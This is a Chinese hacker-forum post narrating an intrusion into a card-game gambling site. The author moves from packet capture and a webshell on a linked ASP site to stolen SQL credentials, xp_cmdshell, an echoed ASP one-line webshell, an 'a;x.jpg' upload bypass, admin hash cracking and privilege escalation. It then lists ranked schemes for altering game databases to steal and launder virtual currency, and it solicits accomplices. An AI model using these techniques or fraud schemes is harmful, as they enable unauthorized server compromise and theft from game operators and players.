对某棋牌游戏的一次入侵 & update之我见 - 技术文章

    From:www.bhst.org & www.T00ls.net
    About:杀虫剂
    Starting:<BHST&T00LS>

    自BHST改版后就没发过文章了，看兔子和一干人发了这么多，感觉压力很大，辜负老大对我们的期望啊，嘿嘿,,,最近跟朋友一起开了个棋牌游戏俩人都搞技术的不懂宣传，开不到一个月倒闭关门了！汗….经常上草榴看AV看得发虚，决定再日个好点的游戏端顺路UPDAT搞点小钱买猪肉补下身子…打开百度，写了几个关键字找到某网站，web看起来很舒服，决定日它了.老方法先注册-下载程序-安装-先别点登陆打开抓包工具监听后再点登陆

    整个验证过程都被抓包工具监视，这里提示游戏有2个不同的IP连接，日多了这些东西经验告诉我一个是SQL服务器一个是WEB服务器IP，至于你信不信，反正我是信了，把IP和URL地址先用文本记录再点登陆进入游戏界面，

    点冲值发现它调用的是一个和主站无关的地址，

    整理完抓包到的信息开始分析发现前面没什么大的突破，打开冲值地址的时候主站是个asp的皮具公司，默认的后台拿SHELL过程很简单这里不多说了…在根目录下翻到web.config文件找到sql的配置信息，数据库的IP地址就是前面2个IP中的一个， 搞得有经验了很容易就知道用户库是哪个，用户不是很多，不好洗，先看看自己注册用户

    很多人说可以UPDATE吧，但当我查询金库的时候悲剧了，显示返回空白，怎么会这样呢，开始以为会不会金库和用户库是分开的金库不在上面，但怎么看怎么想都不像，经验告诉我绝对是这个库没错，不得奇解中看小K在Q跟小K聊了下，也觉得不太可能，管它呢提权上服务器去看看吧！xp_cmdshell 'netstat' 3389开启，加用户提示拒绝访问

    蛋痛了一下，会不会net被管理设置了权限？执行其他部分命令都是提示发生系统错误5 ，拒绝访问  心想会不会SA被降权了吧，whoami还真是

    这下郁闷，之前的抓包分析SQL服务器上有WEB，但是这里权限不够DIR不到路径也是白搭，无聊中在IE里直接输入IP提示弹出一个建设中….

    看到这个给了我很大的希望，这下好了路径也知道了，虽然觉得默认好象是没开启asp和解析但死马当活马医先搞个一句话上去看看再说！echo ^<%execute request("a")%^> >> c:\Inetpub\wwwroot\a.asp提示无权限,小K说备份吧但也是没权限，纠结…

    听了会歌，上了下WC出来，小K丢过来几个WEB路径，问他怎么列出来的他说下载个vbs到服务器然后 cscript.exe xx.vbs，这个方法不是说没想到总觉得应该也是没权限执行所以就没去弄，很欣赏小K的这一点仔细认真的性格，也让我觉得以后做什么事情不能太武断了。默认的FTP，连接显示空白无读取和写的权限，拿SHELL的路子又断了…我在一边看着这这几个地址感觉有个很像是管理地址，组合了一下试了几次提交弹出一个管理登陆页面

    嘿嘿！心情有点激动，但没管理密码呢，在数据库里也找不到管理员的库和表。不能这么放弃，想了想SQL命令读下最前面1-10的普通游戏玩家看看，因为最靠前的跟管理肯定有关系，这里人品很好读到一个貌似是管理的用户

    MD5跑了下密码登陆后台成功了，

    添加新闻这有个编辑器可以设置上传文件是否自动改名勾否，传了个a;x.jpg的一句话shell，systeminfo系统只打了一个补丁，直接扣肉提权导管理HASH破解上服务器

    管理权限就是好，可以看金币库数据了！丢一边等它发展，管理以后不跑路的话，也许我能刷到…..*（……%￥%##

    上面的可看可不看，重点来了，做为一个刚入门的新人我知道T00LS里刷库的前辈很多，UPDATE也是门很高深的一门技巧，绝不会是有些人想的那么简单，高级刷库咱就不要求了，咱就聊聊游戏棋牌简单刷库洗库的经验！献丑先说说我知道的方法，1-4是属于无本创业型月入几千不是梦的

1：搞个新号去申请代理，自己UPDATE别的玩家为自己下家抽水  
缺点：(效果慢，而且下家多了很容易让管理发现有问题)
优点：比较稳定

2：UPDATE别人的号，写上自己的信息
缺点：容易发现
优点：不太注意的管理很容易被欺骗到

3：自己注册新号  
缺点：平白无故多了很大多东西？？WHY？不推荐这个方法
优点：如果管理是SB的话这方法就是最好的方法

4：找批老号 有冲值和提现的，UPDATE成自己后正常去洗  洗完后清理掉数据再去玩
如果说刚才那些只是糊口那么下面这些看技术能力和资本了，游戏得大有点规模，技术，对库的研究得非常熟悉，月入几十上百W买车买房型的

5：冲钱正常去玩UPDATE游戏的过程  比如你本来是输的 UPDATE成赢的
6：写脚本远程UPDATE无痕迹 跟游戏里金币商合作
7：自己投钱做这个游戏的代理或金商再结合第7个
7：高级的刷库，入侵写作弊器插程序里，结合6某些大牛经常做的事情

    .........................牛人补充吧！…………….那些洗淘宝，购物， 钓鱼的在哪呢……………………..

    另求组队UPDATE，洗库，暴菊，基友..给我月入几千的机会吧….

留言评论（旧系统）：